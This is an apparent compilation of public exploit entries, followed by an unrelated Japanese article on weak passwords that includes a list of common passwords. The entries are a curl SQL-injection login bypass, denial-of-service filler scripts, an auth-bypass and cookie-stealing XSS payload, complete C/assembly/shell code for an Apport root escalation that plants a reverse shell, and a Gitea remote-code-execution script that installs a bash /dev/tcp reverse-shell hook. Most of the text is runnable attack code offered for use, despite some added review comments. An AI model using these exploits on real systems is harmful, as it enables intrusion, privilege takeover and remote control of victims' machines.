curl http://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="
-
AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
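# Exploit Title: AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: http://agatasoft.com/
# Software Link: http://agatasoft.com/Ping_Master_Pro.exe
# Version: 2.1
# Tested on: Windows 10 Home x64

#STEPS
# Open the program AgataSoft PingMaster Pro
# In Tools select the option Trace Route
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field Host name and click in Get IP from host name
# End :)
"""Write a long filler string to a file for pasting into the vulnerable input field."""


def write_buffer(path="Gou.txt", char="S", length=10000):
    """Write ``length`` copies of ``char`` to ``path`` and return the number of characters written.

    The file is closed even if the write fails.  Raises OSError when the file
    cannot be created or written (the original swallowed every exception with a
    bare ``except``, hiding the reason).
    """
    buffer = char * length
    with open(path, "w") as fh:
        fh.write(buffer)
    return len(buffer)


if __name__ == "__main__":
    try:
        write_buffer()
        print("Archive ready")
    except OSError as exc:
        print("Archive no ready: %s" % exc)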
-
Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
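# Exploit Title: Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://switchportmapper.com/
# Software Link: https://switchportmapper.com/download.htm
# Version: 2.85.2
# Tested on: Windows 10 Home x64

#STEPS
# Open the program Managed Switch Port Mapping Tool
# In the left side select Settings from Router/Srvr 1 (for layer 2 Switches)
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Gou.txt"
# Paste the content in the field IP Address and SNMP v1/v2c Read Community Name
# Click in OK
# End :)
"""Write a long filler string to a file for pasting into the vulnerable input fields."""


def write_buffer(path="Gou2.txt", char="F", length=10000):
    """Write ``length`` copies of ``char`` to ``path`` and return the number of characters written.

    The file is closed even if the write fails.  Raises OSError when the file
    cannot be created or written (the original swallowed every exception with a
    bare ``except``, hiding the reason).
    """
    buffer = char * length
    with open(path, "w") as fh:
        fh.write(buffer)
    return len(buffer)


if __name__ == "__main__":
    try:
        write_buffer()
        print("Archive ready")
    except OSError as exc:
        print("Archive no ready: %s" % exc)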
-
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
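# Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
# Date: 2021-02-15
# Exploit Author: Ismael Nava
# Vendor Homepage: https://www.nsauditor.com/
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Version: 3.2.2.0
# Tested on: Windows 10 Home x64

#STEPS
# Open the program Nsauditor
# In Options select Configuration...
# Click in Security Events
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Liella.txt"
# Paste the content in the field Event Description and click in Add Event
# End :)
"""Write a long filler string to a file for pasting into the vulnerable input field."""


def write_buffer(path="Liella.txt", char="U", length=10000):
    """Write ``length`` copies of ``char`` to ``path`` and return the number of characters written.

    The file is closed even if the write fails.  Raises OSError when the file
    cannot be created or written (the original swallowed every exception with a
    bare ``except``, hiding the reason).
    """
    buffer = char * length
    with open(path, "w") as fh:
        fh.write(buffer)
    return len(buffer)


if __name__ == "__main__":
    try:
        write_buffer()
        print("Archive ready")
    except OSError as exc:
        print("Archive no ready: %s" % exc)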
-
Billing Management System 2.0 - 'email' SQL injection Auth Bypass
# Exploit Title: Billing Management System 2.0 - 'email' SQL injection Auth Bypass
# Date: 2021-02-16
# Exploit Author: Pintu Solanki
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14380/billing-management-system-php-mysql-updated.html
# Software: Billing Management System 2.0
# Vulnerability Type: SQL injection - Auth Bypass
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Description: the login form passes the username and password into the SQL query without sanitisation, so a tautology in either field makes the credential check always succeed.
# Vulnerable Page: http://localhost/smartbilling/smartbilling_source_code/index.php
# Payload used:
#   Username => admin' or '1'='1
#   Password => admin' or '1'='1
# POC: open the page (http://localhost/smartbilling/smartbilling_source_code/index.php), submit the payload in both fields, and the application logs you straight into the admin area.
-
Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Suresh Kumar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html
# Software: Faulty Evaluation System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
# Description: the student name fields are stored and rendered back in the student list without being neutralised, so markup saved there is interpreted by the browser of every user who opens the list (stored XSS).
# Vulnerable Page: http://localhost/evaluation/student/list
# Vulnerable functionality: 'Student'
# Vulnerable Input Fields: {Firstname} {Lastname} {Middle Name}
# Payload used: <a onmouseover="alert(document.cookie)">xxs link</a>
# POC: save the payload in any of the fields; each time the page (http://localhost/evaluation/student/list) is loaded, the stored markup is rendered and the handler fires when the link is hovered.
# You will see your JavaScript code (XSS) executed.
-
Apport 2.20 - Local Privilege Escalation
# Exploit Title: Apport 2.20 - Local Privilege Escalation
# Date: 18/02/21
# Exploit Author: Gr33nh4t
# Vendor Homepage: https://ubuntu.com/
# Version:
Apport: Ubuntu 20.10 - Before 2.20.11-0ubuntu50.5
Apport: Ubuntu 20.04 - Before 2.20.11-0ubuntu27.16
Apport: Ubuntu 18.04 - Before 2.20.9-0ubuntu7.23
Apport: Ubuntu 16.04 - Before 2.20.1-0ubuntu2.30
# Tested on: Ubuntu

This is a POC for Apport exploit, we exploited these bugs by launching a reverse shell to 127.0.0.1:1234.

# Setup
To compile the exploit code several packages are needed:
sudo apt-get install build-essential nasm gcc

# Compilation
make

# Run
./exploit.sh
The reverse shell will connect on the next execution of logrotate
nc -l -p 1234

## Makefile ##
# Builds three artefacts: `exploit` (the C driver), `crash` (a long-sleeping
# process whose .data holds a logrotate config) and `decoy` (a process that
# segfaults immediately).  crash/decoy are linked directly with ld, no libc.
.PHONY: all clean
CC=gcc
CFLAGS=
NASM=nasm
NASM_FLAGS=-f elf64
LD=ld

all: exploit crash decoy

exploit: exploit.c
	$(CC) -o $@ $< $(CFLAGS)
	chmod +x $@

crash: crash.o
	$(LD) $^ -o $@

decoy: decoy.o
	$(LD) $^ -o $@

crash.o: crash.asm
	$(NASM) $(NASM_FLAGS) $^

decoy.o: decoy.asm
	$(NASM) $(NASM_FLAGS) $^

clean:
	rm exploit decoy crash *.o

## crash.asm ##
; The .data section is the payload: a logrotate stanza with a `firstaction`
; script that opens a reverse shell to 127.0.0.1:1234.  The process is made to
; dump core while its cwd is /etc/logrotate.d/ (see exploit.c), so this text
; ends up inside /etc/logrotate.d/core, where logrotate reads it on its next
; run.  NOTE(review): the surrounding binary junk in the core file being
; tolerated by logrotate's parser is what the README relies on - confirm
; against the target's logrotate version if the shell never connects.
section .data
message db 10,"/var/crash/test.log{",10," su root root",10," daily",10," size=0",10," firstaction",10," python3 -c ", 34, "import sys,socket,os,pty; s=socket.socket();s.connect(('127.0.0.1', 1234));[os.dup2(s.fileno(), fd) for fd in (0,1,2)];pty.spawn('/bin/sh')", 34, ";",10," endscript",10,"}",10, 00
; Argument for the nanosleep syscall below.  NOTE(review): nanosleep takes a
; struct timespec of two 64-bit longs; these two 32-bit dwords are read as
; one 64-bit tv_sec (4000000 s) and tv_nsec comes from whatever follows in
; .data - it works, but only by layout accident.
timeval:
tv_sec dd 0
tv_usec dd 0
section .text
global _start
_start:
mov dword [tv_sec], 4000000
mov dword [tv_usec], 0
; rax=35 is nanosleep on x86_64: park the process for ~46 days so exploit.c
; can SIGSEGV it at the chosen moment.
mov rax, 35
mov rdi, timeval
mov rsi, 0
syscall

## decoy.asm ##
; Deliberate write to address 0 -> immediate SIGSEGV.  Its crash report path
; is pre-created as a FIFO by exploit.sh, so the apport instance handling
; this crash blocks on open() and holds the apport lock.
section .text
global _start
_start:
mov dword [0], 0

## exploit.c ##
/*
 * Driver for the PID-reuse race:
 *  1. start `crash` and remember its PID;
 *  2. fork/exit until the PID counter is just below that PID;
 *  3. SIGSEGV `crash` (apport #2 is queued behind the FIFO-blocked apport #1),
 *     then SIGKILL it so the PID becomes free;
 *  4. fork a burst of children; the one that lands on the old PID execs
 *     sudo (setuid root) under a name crafted to look like "Uid: 0" lines;
 *  5. write to the FIFO to release apport #1, so apport #2 resumes and
 *     examines the PID now owned by the root process, dumping the `crash`
 *     core into the cwd (/etc/logrotate.d/).
 * NOTE(review): step 4/5 semantics are inferred from the code and the
 * README; confirm against the author's write-up before changing the timing
 * constants.  Timing (the sleep() calls) and PID arithmetic are load-bearing.
 */
#include <unistd.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

/* Stop the PID warm-up this many PIDs short of the target. */
#define PID_THRESHOLD (80)

/*
 * Read /proc/sys/kernel/pid_max as an int.
 * NOTE(review): fopen() is unchecked (NULL deref if /proc is unavailable)
 * and fread() does not NUL-terminate buf; atoi() only stops at the '\n' the
 * kernel writes after the number, so the remaining bytes of buf are never
 * read in practice, but the buffer is uninitialised.  A fix would be
 * `size_t n = fread(buf, 1, sizeof(buf) - 1, fd); buf[n] = '\0';`.
 */
int read_max_pid_file() {
    FILE *fd = 0;
    char buf[256];
    fd = fopen("/proc/sys/kernel/pid_max", "r");
    fread(buf, sizeof(buf), 1, fd);
    fclose(fd);
    return atoi(buf);
}

/*
 * Write "A\0" (sizeof includes the terminator) to the FIFO at path.
 * Opening a FIFO for writing blocks until a reader has it open; here the
 * reader is apport #1, so this call doubles as the release signal.
 * NOTE(review): fopen() is unchecked; a wrong path yields a NULL deref.
 */
void write_to_fifo_file(char * path) {
    FILE *fd = 0;
    char buf[] = "A";
    fd = fopen(path, "w");
    fwrite(buf, sizeof(buf), 1, fd);
    fclose(fd);
    return;
}

/* argv[1]: path of the decoy's FIFO crash file (created by exploit.sh).
 * NOTE(review): argc is never checked; running without an argument passes
 * NULL into write_to_fifo_file(). */
int main(int argc, char *argv[]) {
    int iteration = 0;
    pid_t crash_pid = -1, temp_pid = -1, spray_pid = -1;
    int current_pid = 0, max_pid = 0;   /* current_pid is unused */
    int total_pid = 0;                  /* unused */
    char *crash_argv[] = {"crash", NULL};
    char *sudo_argv[] = {"sudo", "-S", "sud", NULL};
    char current_dir[1024] = {0};
    char exec_buf[2048] = {0};
    char crash_buf[2048] = {0};
    struct stat sb = {0} ;
    int null_fd = -1;

    /* Auto-reap the thousands of short-lived children forked below. */
    signal(SIGCHLD, SIG_IGN);
    getcwd(current_dir, sizeof(current_dir));
    /* exec_buf is the symlink to sudo created by exploit.sh; its basename
     * embeds '\r' so the 15-char process name contains "Uid: 0" / "Gid: 0"
     * fragments.  NOTE(review): which apport parser this fools is not
     * visible here - see the write-up. */
    snprintf(exec_buf, sizeof(exec_buf), "%s/%s", current_dir, "a\rUid: 0\rGid: 0");
    snprintf(crash_buf, sizeof(crash_buf), "%s/%s", current_dir, "crash");
    /* Core files land in the cwd of the crashing process' handler chain;
     * this is where the payload must be written. */
    chdir("/etc/logrotate.d/");

    // Creating the crash program
    if (0 == stat(crash_buf, &sb) && sb.st_mode & S_IXUSR) {
        crash_pid = fork();
        if (0 == crash_pid) {
            execve(crash_buf, crash_argv, NULL);
            exit(0);
        } else if(-1 == crash_pid) {
            printf("[-] Could not fork program\n");
            return -1;
        }
    } else {
        printf("[-] Please check crash file executable.");
        return -1;
    }

    max_pid = read_max_pid_file();
    printf("[*] crash pid: %d\n", crash_pid);
    printf("[*] max pid: %d\n", max_pid);
    printf("[*] Creating ~%d PIDs\n", max_pid);
    printf("[*] Forking new processes\n");
    sleep(3);

    // Iterating through max_pid to almost reach the crash program pid
    while (iteration < max_pid - 1) {
        // Print progress of forks
        // NOTE(review): (int)(max_pid / 5000) is 0 when pid_max < 5000,
        // which would make the modulo divide by zero.
        if( 0 == (iteration % (int)(max_pid / 5000))) {
            printf("\rIteration: %d/%d", iteration + 1, max_pid);
            fflush(stdout);
        }
        temp_pid = -1;
        temp_pid = fork();
        if (0 == temp_pid) {
            exit(0);
        } else if (temp_pid > 0) {
            iteration++;
            // We should stop before the crash pid to avoid other processes created meanwhile to interfere the exploit process
            if ( temp_pid < crash_pid && crash_pid - temp_pid < PID_THRESHOLD) {
                printf("\rIteration: %d/%d\n", iteration + 1, max_pid);
                fflush(stdout);
                printf("[+] less then %d pid from the target: last fork=%d , target: %d\n", PID_THRESHOLD, temp_pid, crash_pid);
                break;
            }
        } else if (-1 == temp_pid) {
            printf("[-] Could not fork temp programs\n");
        }
    }

    printf("[*] Crashing the crash program\n");
    kill(crash_pid, SIGSEGV);
    // From now on the second apport will launch and we have 30 seconds to exploit it
    sleep(5);
    printf("[*] Killing the crash program\n");
    kill(crash_pid, SIGKILL);
    sleep(3);

    // Now crash pid is free and we need to occupy it
    for(int i=0; i < PID_THRESHOLD ; i++) {
        spray_pid = fork();
        if (0 == spray_pid) {
            if (crash_pid == getpid()) {
                /* Silence sudo's prompt/errors; "-S" reads the password from
                 * stdin, so the process just sits there as a root-owned PID. */
                null_fd = open("/dev/null", O_WRONLY);
                dup2(null_fd, 1);
                dup2(null_fd, 2);
                close(null_fd);
                printf("[+] Creating suid process\n");
                execve(exec_buf, sudo_argv, NULL);
            }
            exit(0);
        }
    }
    sleep(3);

    printf("[*] Writing to fifo file\n");
    write_to_fifo_file(argv[1]);
    // Now the first apport released and the second apport resumed
    printf("[+] Wrote core file to cwd!\n");
    sleep(10); // Waiting for the second apport to finish execution
    return 0;
}

## exploit.sh ##
#!/bin/sh
# Orchestration: prepare the decoy crash FIFO, crash the decoy so apport #1
# blocks on it, create the '\r'-named sudo symlink, run ./exploit, then
# check for the planted /etc/logrotate.d/core.
set -e
echo "[*] Running exploit"
touch /var/crash/test.log
ulimit -c unlimited
# NOTE(review): "~" inside double quotes is NOT expanded, so both tests below
# always report "not exists".  The mkdir -p is harmless; the settings file is
# therefore rewritten on every run (which does guarantee unpackaged=true).
if [ ! -d "~/.config/apport" ]; then
echo "[*] Settings directory not exists"
echo "[*] Creating settings directory"
mkdir -p ~/.config/apport
fi
if [ ! -f "~/.config/apport/settings" ] ; then
echo "[*] Settings file not exists"
# NOTE(review): relies on `echo` interpreting "\n" (true for dash, the
# Ubuntu /bin/sh; not for bash).  printf '[main]\nunpackaged=true\n' is portable.
echo "[main]\nunpackaged=true\n" > ~/.config/apport/settings
echo "[+] Settings file created"
fi
# apport names reports <path-with-slashes-as-underscores>.<uid>.crash.
DECOY_PATH=`realpath ./decoy`
MY_UID=`id -u`
DECOY_CRASH_NAME=`echo "${DECOY_PATH}.${MY_UID}.crash" | sed 's/\//_/g'`
DECOY_CRASH_PATH="/var/crash/${DECOY_CRASH_NAME}"
if [ -f $DECOY_CRASH_PATH ] || [ -p $DECOY_CRASH_PATH ] ; then
echo "[*] decoy crash exists deleting the file"
rm $DECOY_CRASH_PATH
fi
# A FIFO in place of the report file makes apport #1 block when it opens it.
mkfifo $DECOY_CRASH_PATH
echo "[+] FIFO file created"
./decoy 2>&1 >/dev/null &
killall -SIGSEGV ./decoy
echo "[+] Decoy process created"
# Symlink to sudo under a name containing carriage returns (see exploit.c).
SUDO_PATH=`which sudo`
ln -s $SUDO_PATH "linkchange"
python3 -c "import os; os.rename('./linkchange', 'a\rUid: 0\rGid: 0')"
echo "[+] symlink to sudo created"
./exploit $DECOY_CRASH_PATH
rm $DECOY_CRASH_PATH
sleep 5
if [ -f "/etc/logrotate.d/core" ] ; then
echo "[*] Exploit succesfully finished"
else
echo "[*] Exploit failed"
fi
# Kill the sudo process after second apport finished
# NOTE(review): `pkill -f "sudo -S sud"` does the same without the grep chain.
kill `ps -ef | grep "sudo -S sud" | grep -v grep | awk '{print $2}'`
##
Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Exploit Title: Gitea 1.12.5 - Remote Code Execution (Authenticated)
# Date: 17 Feb 2020
# Exploit Author: Podalirius
# PoC demonstration article: https://podalirius.net/en/articles/exploiting-cve-2020-14144-gitea-authenticated-remote-code-execution/
# Vendor Homepage: https://gitea.io/
# Software Link: https://dl.gitea.io/
# Version: >= 1.1.0 to <= 1.12.5
# Tested on: Ubuntu 16.04 with GiTea 1.6.1

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Defensive summary of what this listing demonstrates: an ordinary
# authenticated user edits a repository's server-side git hook through the
# web UI; the hook body is executed by the git server process on the next
# push. Detection opportunities visible below: POSTs to
# /<user>/<repo>/settings/hooks/git/{pre-receive,update,post-receive},
# a hook body that spawns `bash -i` towards /dev/tcp, and an outbound
# connection from the Gitea host right after a push.
# Mitigation (from the upstream fix, not shown in this listing — verify
# against the vendor advisory): restrict git-hook editing to administrators
# or disable custom git hooks entirely.

import argparse
import os
import pexpect
import random
import re
import sys
import time
import requests

# TLS verification is disabled and a permissive cipher string is appended for
# the whole process — fine for a lab PoC, but this also hides MITM of the
# operator's own credentials.
requests.packages.urllib3.disable_warnings()
requests.packages.urllib3.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
try:
    requests.packages.urllib3.contrib.pyopenssl.util.ssl_.DEFAULT_CIPHERS += ':HIGH:!DH:!aNULL'
except AttributeError:
    pass


class GiTea(object):
    """Minimal client for the Gitea web-UI endpoints used by this PoC.

    Covers login/logout, repository create/delete and editing of the three
    server-side git hooks. All requests go through one ``requests.Session``
    so the login cookie is reused; every state-changing POST first scrapes
    the ``_csrf`` meta tag from a page the session can read.
    """

    def __init__(self, host, verbose=False):
        """Store the base URL; no request is made until ``login``.

        Args:
            host: base URL of the Gitea instance (scheme included).
            verbose: print one line per method call when True.
        """
        super(GiTea, self).__init__()
        self.verbose = verbose
        self.host = host
        self.username = None
        self.password = None
        self.uid = None
        self.session = None

    def _get_csrf(self, url):
        """Return the ``_csrf`` meta-tag value of ``url``.

        Polls once per second until the tag is present; there is no upper
        bound, so an unexpected page layout blocks forever.
        """
        pattern = 'name="_csrf" content="([a-zA-Z0-9\-\_=]+)"'
        csrf = []
        while len(csrf) == 0:
            r = self.session.get(url)
            csrf = re.findall(pattern, r.text)
            time.sleep(1)
        csrf = csrf[0]
        return csrf

    def _get_uid(self, url):
        """Return the numeric ``_uid`` meta-tag value of ``url``.

        Same unbounded polling loop as ``_get_csrf``.
        """
        pattern = 'name="_uid" content="([0-9]+)"'
        uid = re.findall(pattern, self.session.get(url).text)
        while len(uid) == 0:
            time.sleep(1)
            uid = re.findall(pattern, self.session.get(url).text)
        uid = uid[0]
        return int(uid)

    def login(self, username, password):
        """Authenticate with a username/password pair.

        Returns:
            False when the response contains the "incorrect" banner,
            True otherwise (the user id is then cached in ``self.uid``).
        """
        if self.verbose == True:
            print(" [>] login('%s', ...)" % username)
        self.session = requests.Session()
        r = self.session.get('%s/user/login' % self.host)
        self.username = username
        self.password = password
        # Logging in
        csrf = self._get_csrf(self.host)
        r = self.session.post(
            '%s/user/login?redirect_to=%%2f%s' % (self.host, self.username),
            data = {'_csrf':csrf, 'user_name':username, 'password':password},
            allow_redirects=True
        )
        # Success is inferred from the absence of the error banner only;
        # any other failure mode (lockout, 2FA prompt) is reported as success.
        if b'Username or password is incorrect.' in r.content:
            return False
        else:
            # Getting User id
            self.uid = self._get_uid(self.host)
            return True

    def repo_create(self, repository_name):
        """Create a private-by-default, uninitialised repository owned by ``self.uid``."""
        if self.verbose == True:
            print(" [>] Creating repository : %s" % repository_name)
        csrf = self._get_csrf(self.host)
        # Create repo
        r = self.session.post(
            '%s/repo/create' % self.host,
            data = {
                '_csrf' : csrf,
                'uid' : self.uid,
                'repo_name' : repository_name,
                'description' : "Lorem Ipsum",
                'gitignores' : '',
                'license' : '',
                'readme' : 'Default',
                'auto_init' : 'off'
            }
        )
        return None

    def repo_delete(self, repository_name):
        """Delete ``<username>/<repository_name>``; the response is not checked."""
        if self.verbose == True:
            print(" [>] Deleting repository : %s" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings' % (self.host, self.username, repository_name))
        # Delete repository
        r = self.session.post(
            '%s/%s/%s/settings' % (self.host, self.username, repository_name),
            data = {
                '_csrf' : csrf,
                'action' : "delete",
                'repo_name' : repository_name
            }
        )
        return

    def repo_set_githook_pre_receive(self, repository_name, content):
        """Replace the repository's server-side pre-receive hook with ``content``.

        The hook body runs on the server at push time, which is the whole
        vulnerability: a non-admin user can write it.
        """
        if self.verbose == True:
            print(" [>] repo_set_githook_pre_receive('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name))
        # Set pre receive git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/pre-receive' % (self.host, self.username, repository_name),
            data = {
                '_csrf' : csrf,
                'content' : content
            }
        )
        return

    def repo_set_githook_update(self, repository_name, content):
        """Replace the repository's server-side update hook with ``content``."""
        if self.verbose == True:
            print(" [>] repo_set_githook_update('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name))
        # Set update git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/update' % (self.host, self.username, repository_name),
            data = {
                '_csrf' : csrf,
                'content' : content
            }
        )
        return

    def repo_set_githook_post_receive(self, repository_name, content):
        """Replace the repository's server-side post-receive hook with ``content``.

        This is the hook the ``__main__`` block uses.
        """
        if self.verbose == True:
            print(" [>] repo_set_githook_post_receive('%s')" % repository_name)
        csrf = self._get_csrf('%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name))
        # Set post receive git hook
        r = self.session.post(
            '%s/%s/%s/settings/hooks/git/post-receive' % (self.host, self.username, repository_name),
            data = {
                '_csrf' : csrf,
                'content' : content
            }
        )
        return

    def logout(self):
        """End the web session (GET /user/logout)."""
        if self.verbose == True:
            print(" [>] logout()")
        # Logging out
        r = self.session.get('%s/user/logout' % self.host)
        return None


def trigger_exploit(host, username, password, repository_name, verbose=False):
    """Push one commit over HTTP(S) so the server runs the post-receive hook.

    Builds a throw-away repository in a ``mktemp -d`` directory (never
    removed), then drives ``git push`` through pexpect to answer the
    credential prompts. ``host``, ``username`` and ``repository_name`` are
    interpolated into shell commands unquoted, so they must be operator
    controlled, never taken from an untrusted source.
    """
    # Create a temporary directory
    tmpdir = os.popen('mktemp -d').read().strip()
    os.chdir(tmpdir)
    # We create some files in the repository
    os.system('touch README.md')
    # Random README content guarantees a new commit even on re-runs.
    rndstring = ''.join([hex(random.randint(0,15))[2:] for k in range(32)])
    os.system('echo "%s" >> README.md' % rndstring)
    os.system('git init')
    os.system('git add README.md')
    os.system('git commit -m "Initial commit"')
    # Connect to remote source repository
    os.system('git remote add origin %s/%s/%s.git' % (host, username, repository_name))
    # Push the files (it will trigger post-receive git hook)
    conn = pexpect.spawn("/bin/bash -c 'cd %s && git push -u origin master'" % tmpdir)
    conn.expect("Username for .*: ")
    conn.sendline(username)
    conn.expect("Password for .*: ")
    conn.sendline(password)
    conn.expect("Total.*")
    print(conn.before.decode('utf-8').strip())
    return None


def header():
    """Print the tool banner (the ASCII art is flattened in this listing)."""
    print(""" _____ _ _______ / ____(_)__ __| CVE-2020-14144 | | __ _ | | ___ __ _ | | |_ | | | |/ _ \/ _` | Authenticated Remote Code Execution | |__| | | | | __/ (_| | \_____|_| |_|\___|\__,_| GiTea versions >= 1.1.0 to <= 1.12.5 """)


if __name__ == '__main__':
    header()
    parser = argparse.ArgumentParser(description='Process some integers.')
    parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Increase verbosity.')
    parser.add_argument('-t','--target', required=True, type=str, help='Target host (http://..., https://... or domain name)')
    parser.add_argument('-u','--username', required=True, type=str, default=None, help='GiTea username')
    parser.add_argument('-p','--password', required=True, type=str, default=None, help='GiTea password')
    parser.add_argument('-I','--rev-ip', required=False, type=str, default=None, help='Reverse shell listener IP')
    parser.add_argument('-P','--rev-port', required=False, type=int, default=None, help='Reverse shell listener port')
    parser.add_argument('-f','--payload-file', required=False, default=None, help='Path to shell script payload to use.')
    args = parser.parse_args()

    # Either a listener pair or a payload file is required; nothing validates
    # that both are not given (the file wins below).
    if (args.rev_ip == None or args.rev_port == None):
        if args.payload_file == None:
            print('[!] Either (-I REV_IP and -P REV_PORT) or (-f PAYLOAD_FILE) options are needed')
            sys.exit(-1)

    # Read specific payload file
    if args.payload_file != None:
        f = open(args.payload_file, 'r')
        hook_payload = ''.join(f.readlines())
        f.close()
    else:
        hook_payload = """#!/bin/bash\nbash -i >& /dev/tcp/%s/%d 0>&1 &\n""" % (args.rev_ip, args.rev_port)

    # Bare host names default to https.
    if args.target.startswith('http://'):
        pass
    elif args.target.startswith('https://'):
        pass
    else:
        args.target = 'https://' + args.target

    print('[+] Starting exploit ...')
    g = GiTea(args.target, verbose=args.verbose)
    if g.login(args.username, args.password):
        # The repository name is fixed; an existing 'vuln' repo of this user
        # is deleted first, which is destructive and leaves an audit trail.
        reponame = 'vuln'
        g.repo_delete(reponame)
        g.repo_create(reponame)
        g.repo_set_githook_post_receive(reponame, hook_payload)
        g.logout()
        trigger_exploit(g.host, g.username, g.password, reponame, verbose=args.verbose)
        g.repo_delete(reponame)
    else:
        print('\x1b[1;91m[!]\x1b[0m Could not login with these credentials.')
    print('[+] Exploit completed !')
タイトル:弱いパスワードの脆弱性の詳細な説明
### 弱いパスワードの定義 弱いパスワードには、厳格で正確な定義はありません。通常、他の人が簡単に推測できるパスワード(あなたをよく知っている人かもしれません)または、クラックツールで解読できるパスワードが弱いパスワードと考えられています。弱いパスワードとは、「123」、「ABC」などの単純な数字や文字のみを含むパスワードを指します。そのようなパスワードは他人に簡単に割れてしまい、ユーザーのインターネットアカウントが他人に制御されてしまうため、ユーザーはそれらを使用することをお勧めしません。 ### 弱いパスワードの原因 これは個人的な習慣と意識に関連するはずです。パスワードの忘れを避けるために、非常に簡単に覚えやすいパスワードを使用するか、システムのデフォルトパスワードなどを直接使用します。セキュリティ認識は十分ではありません。私はいつも誰も私の弱いパスワードを推測しないと思います。私は十分なセキュリティ認識を持っていません。私はいつも誰も私の弱いパスワードを推測しないと思います。 ### 弱いパスワードの危険 システムの弱いパスワードを介して、システム制御の許可はハッカーによって直接取得できます。 ### 弱いパスワードの対策 すべての管理システムアカウントのパスワード強度を強制し、特定のレベルに達する必要があります。 adminや123456などの単純で弱いパスワードを使用することはできません。パスワードを複雑なパスワードに変更して暗号化して保存します。パスワードには、大文字と小文字、数字、特殊記号が含まれ、パスワードの長さは8桁以上であることをお勧めします。ウェブサイトにデータリークの脆弱性がある場合(SQLインジェクションの脆弱性など)、脆弱性を修正する必要があります。 通常、パスワードを設定するときは、次の原則に従います。 (1)空のパスワードやシステムのデフォルトパスワードを使用しないでください。これらのパスワードはよく知られており、典型的な弱いパスワードです。 (2)パスワードの長さは8文字以上です。 (3)パスワードは、連続文字(たとえば:AAAAAAAA)または特定の文字の組み合わせ(たとえば:TZF.TZF。)であってはなりません。 (4)パスワードは、次の4つのタイプの文字、大文字(A-Z)、小文字(a-z)、数字(0-9)、特殊文字の組み合わせである必要があります。各種類の文字が少なくとも1つ含まれている必要があります。特定の種類の文字が1つしか含まれていない場合、その文字は先頭の文字でも末尾の文字でもあってはなりません。 (5)パスワードには、生年月日、記念日の日付、ログイン名、電子メールアドレスなど、自分に関する関連情報、および辞書の単語が含まれてはなりません。 (6)パスワードは、特定の文字を数字またはシンボルに置き換えた単語であってはなりません。 (7)パスワードは覚えやすく、すぐに入力できる必要があり、他の人があなたの後ろから入力を簡単に見ることができないようにします。 (8)未発見の侵入者がパスワードの使用を継続するのを防ぐために、少なくとも90日に1回はパスワードを変更します。 ### 弱いパスワードの分類 公共の弱いパスワード パブリックの弱いパスワードは一般的なパスワードです。公共の弱いパスワードは、多数のパスワードデータ統計に基づいて高頻度で表示される弱いパスワードです。この点で、弱いパスワードの統計には多くの結果があります。ここでは、より高い頻度でいくつかの公共の弱いパスワードをリストします: (トップ100): 123456 A123456 123456a 5201314 111111Woaini1314 QQ123456 123123 000000 1QAZ2WSX 1Q2W3E4R QWE123 7758521 123QWE A123123 123456AA Woaini520 Woaini 100200 1314520 Woaini123 123321 Q123456 123456789 123456789A 5211314 ASD123 A123456789 Z123456 ASD123456 A5201314 AA123456 AA123456 Zhang123 APTX4869 123123A 1Q2W3E4R5T 1QAZXSW2 5201314A 1Q2W3E AINI1314 31415926 Q1W2E3R4 123456QQ Woaini521 1234QWER A111111520520 ILOVEYOU ABC123 110110 11111A 123456ABC W123456 7758258 123QWEASD 
